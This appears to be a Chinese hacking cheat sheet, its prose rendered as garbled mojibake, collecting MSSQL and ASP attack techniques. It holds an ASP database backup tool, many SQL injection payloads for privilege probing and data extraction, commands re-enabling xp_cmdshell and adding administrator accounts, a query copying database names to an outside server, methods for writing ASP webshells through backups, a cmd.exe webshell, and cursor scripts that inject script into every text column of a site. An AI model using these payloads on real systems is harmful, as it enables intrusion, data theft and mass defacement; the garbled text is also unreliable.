<br>ݿ<INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>ļ·<INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(ݻָļ·,ݳEXEҪΪ˷,..)<br>
<input type="submit" value="ȷ">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql
sqlname = "sa" 'û
sqlpassword = "ݿ" '
sqlLoginTimeout = 15 '½ʱ
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.createObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>ݳɹ!</font>"
elseif act = "restore" then
'ָʱҪûʹݿʱУ
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.createObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>ָɹ!</font>"
else
Response.write "<font color=red>ûѡ</font>"
end if
end if
%>
</BODY>
</HTML>
sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>ɷASPMSSQLݿ V1.0--QQ:79998575</title>
</head>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}.td { font-family: "Courier New"; font-size: 9pt; background-color: #f9f9fd;}.warningColor { font-family: "Courier New"; font-size: 9pt; color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none;}tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px;}td { font-family: "Courier New"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.trHead { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}.inputLogin { font-family: "Courier New"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">ɷASPMSSQLݿ V1.0 </font></td>
</tr>
<tr>
<td>ѡ
<input type="radio" name="act" id="act_backup"value="backup" />
<label for=act_backup></label>
<input type="radio" name="act" id="act_restore" value="restore" />
<label for=act_restore>ָ</label></td>
</tr>
<tr>
<td><label>SQL:
<input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>û:
<input name="sqlname" type="text" value="sa" />
:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>ݿ
<input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>ļ·
<input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(ݻָļ·)</td>
</tr>
<tr>
<td><% Response.write "ļ·:" %>
<font color="#FF0000">
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="ȷ " />
<input name="Submit" type="reset" class="liuyes" size="10" value=" " /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>ʾϢ:<%
if request("action")="" then
response.write "<font color=#ff0000>Ҷ˵ʲô˰ɣ</font>"
end if
'SQL Server ݿıָ!
if request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>ûݿ!</font>"
else
if act = "backup" then
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.createObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Action = 0
bak.Initialize = 1
'bak.Replace = True
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>ݳɹ!</font>"
elseif act="restore" then
'ָʱҪûʹݿʱУ
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.createObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>ָɹ!</font>"
else
Response.write "<font color=red>ѡݻָ!</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html>
(2)
//ʲôȨ
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//ǷжȡijݿȨ
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
and char(124)%2Buser%2Bchar(124)=0
ַ
' and char(124)%2Buser%2Bchar(124)=0 and ''='
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
û
and user>0
' and user>0 and ''='
ǷΪSAȨ
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
DzMSSQLݿ
and exists (select * from sysobjects);--
Ƿֶ֧
;declare @d int;--
ָ xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
//-----------------------
// ִ
//-----------------------
ȿɳģʽ
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Ȼjet.oledbִϵͳ
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
ִ
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
EXEC .. 'cmd /c md c:\1111'
жxp_cmdshellչ洢Ƿڣ
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
дע
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
REG_SZ
ע
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
ȡĿ¼
exec master..xp_dirtree 'c:\winnt\system32\',1,1
ݿⱸ
backup database pubs to disk = 'c:\123.bak'
//
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
sasqlۺùӺִ
exec sp_password NULL,'','sa'
ӺɾһSAȨûtest
exec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin
ɾչ洢xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
չ洢
EXEC ..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
ͣij
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs
ֻijĿ¼µĿ¼
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
dbo.xp_makecab
ĿѹijĿ굵֮ڡ
ҪѹĵԽڲеԶŸ
dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
xp_terminate_process
ͣijִеijIJ Process ID
áԱѡӡ-ѡֶΡѡ pidͿԿÿִг Process ID
xp_terminate_process 2484
xp_unpackcab
ѹ
xp_unpackcab 'c:\test.cab','c:\temp',1
ijװradmin뱻ˣregedit.exe֪ɾ˻DZˣnet.exeڣûа취ʹregedit /e עļmssqlsaȨޣʹ EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c Ϊ12345678ҪĶ˿ֵ EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 ˿ֵΪ1234
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
//õݿ
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
//MasterдȨ
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
sp_makewebtaskֱwebĿ¼дһ仰
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
//±
Update films SET kind = 'Dramatic' Where id = 123
//ɾ
delete from table_name where Stockid = 3
ֹűע
1.жǷע;and 1=1 ;and 1=2
2.жǷmssql ;and user>0
3.עַ'and [ѯ] and ''='
4.ʱû˲'and [ѯ] and '%25'='
5.жݿϵͳ
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.ݿ ;and (select Count(*) from [ݿ])>0
7.ֶ ;and (select Count(ֶ) from ݿ)>0
8.ֶм¼ ;and (select top 1 len(ֶ) from ݿ)>0
9.(1)ֶεasciiֵaccess
;and (select top 1 asc(mid(ֶ,1,1)) from ݿ)>0
(2)ֶεasciiֵmssql
;and (select top 1 unicode(substring(ֶ,1,1)) from ݿ)>0
10.Ȩṹmssql
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.mssqlϵͳʻ
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)Ŀ¼
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('ϲõpaths'))>)
(2)Ŀ¼
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- õǰ
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- Ŀ¼б
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- Ŀ¼Ŀ¼
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 鿴ļ
13.mssqlеĴ洢
xp_regenumvalues ע, Ӽ
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' Զ¼ʽмֵ
xp_regread ,Ӽ,ֵ
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' ƶֵ
xp_regwrite ,Ӽ, ֵ, ֵ, ֵ
ֵ2REG_SZ ʾַ,REG_DWORD ʾ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' дע
xp_regdeletevalue ,Ӽ,ֵ
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' ɾijֵ
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' ɾ,üֵ
14.mssqlbackupwebshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
15.mssqlú
;and (select @@version)>0 Windowsİ汾
;and user_name()='dbo' жϵǰϵͳûDzsa
;and (select user_name())>0 ǰϵͳû
;and (select db_name())>0 õǰӵݿ
16.webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:\wwwtest\l.asp';
(3)
кܶˣرwscript.shell,оûȨϣˡͻ
һ㵱ʱϴcmd.exeȥвġʱ˵
ҪַɹΪ֮
븴ƣ
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if
response.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60><br>")
response.write("<input type=submit value='ִ'></form>")
%>
ΪһaspļȻվĿ¼ȥ
еʱܻ⣬һΪʲôвϴcmd.exeȻ·д롣
ô˳ɹйcacls
ڶǾʱijЩִ
(4)
ȡݿ
and db_name()=0
and db_name(0)=0
and db_name(__i__)=0
and quotename(db_name(__i__))=0
ȡû
and user=0
ȡ汾Ϣ
and @@version=0
ȡ
and @@servername=0
ȡ
and @@servicename=0
ȡϵͳû
and system_user=0
һԻȡлϢ
AnD (dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0
һ̽Ȩ
AnD (cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006f0077006e0065007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006200610063006b00750070006f00700065007200610074006f007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006400610074006100770072006900740065007200) aS vArChAr))=0
ȡݿĿ
AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0
ȡݿļ
and (select top 1 filename from (select top __i__ filename from master..sysdatabases order by filename) t order by filename desc)=0
ͬʱȡݿݿļ
AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY nAmE dEsC)=0
ȡݿıĿ
and (select cast(count(1) as varchar)+char(9) from <ݿ>..sysobjects where xtype=0x75)=0
ȡݿı
and (select top 1 name from (select top __i__ name from <ݿ>..sysobjects where xtype=0X75 order by name) t order by name desc)=0
and (select top 1 quotename(name) from <ݿ>.dbo.sysobjects where xtype=char(85) AND name not in (select top __i__ name from <ݿ>.dbo.sysobjects where xtype=char(85)))=0
ȡֶεĿ
and (select cast(count(1) as varchar)+char(9) from <ݿ>..syscolumns where id=object_id('<>'))=0
ȡݿֶ
and (select top 1 name from (select top __i__ name,id from <ݿ>..syscolumns where id=object_id('<>') order by name) t order by name desc)=0
and (select col_name(object_id('<>'),__i__))=0
ȡıļ¼
AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm <ݿ>..<>)=0
ȡݿ
AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(<1> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<2> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<3> aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ <1>,<2>,<3> FrOm <ݿ>..<> oRdEr bY <>) t oRdEr bY <> dEsC)=0
־챸
--1. гʼ
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<ʱļ:e:\wwwroot\m.asp>' With Init--
--2.
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
--3. ݲļɾʱ
;Backup Log <ݿ> To Disk = '<Ҫɵļ:e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
ݿ챸
1. в챸
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<ʱļ:0x633A5C617364662E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
2. д뵽ݿ
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
3. ݿⲢ
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<Ҫݳļ:0x633A5C617364662E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
ݿ(ָݿָļ¼)
;update <ݿ>..<> set <ֶ>=<ֶ>+'<script>alert("©")</script>' where <Ҫ>--
ݿ(пɲֶκͼ¼Σգ)
;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(<Ҫ(0xʽ)> aS vArChAr(200<˴ӦӦ>))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--
;DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,s yscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<Ҫ>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor--
ִ()
;exec master..xp_cmdshell 'net user name password /add & net localgroup administrators name /add'--
ָ洢 xp_cmdshell
;Exec Master..sp_dropextendedproc 0x780070005F0063006D0064007300680065006C006C00;Exec Master..sp_addextendedproc 0x780070005F0063006D0064007300680065006C006C00,0x78706C6F6737302E646C6C--
SQLServer 2005 ر xp_cmdshell
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell',1;RECONFIGURE;
ر xp_cmdshell
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell',0;RECONFIGURE;
SQLServer 2005 ر OpenDataSource/OpenRowSet
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
رգ
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc Distributed Queries',0;RECONFIGURE;
SQLServer 2005 ־챸
alter database set recovery full
declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup database __dbname__ to disk=@d with init--
drop table --
create table ( image)--
declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with init--
insert into () values(__varchar(ľ))--
declare @d nvarchar(4000) set @d=__nvarchar(ļ) backup log __dbname__ to disk=@d with init--
drop table declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with init--
ҳ:
[1]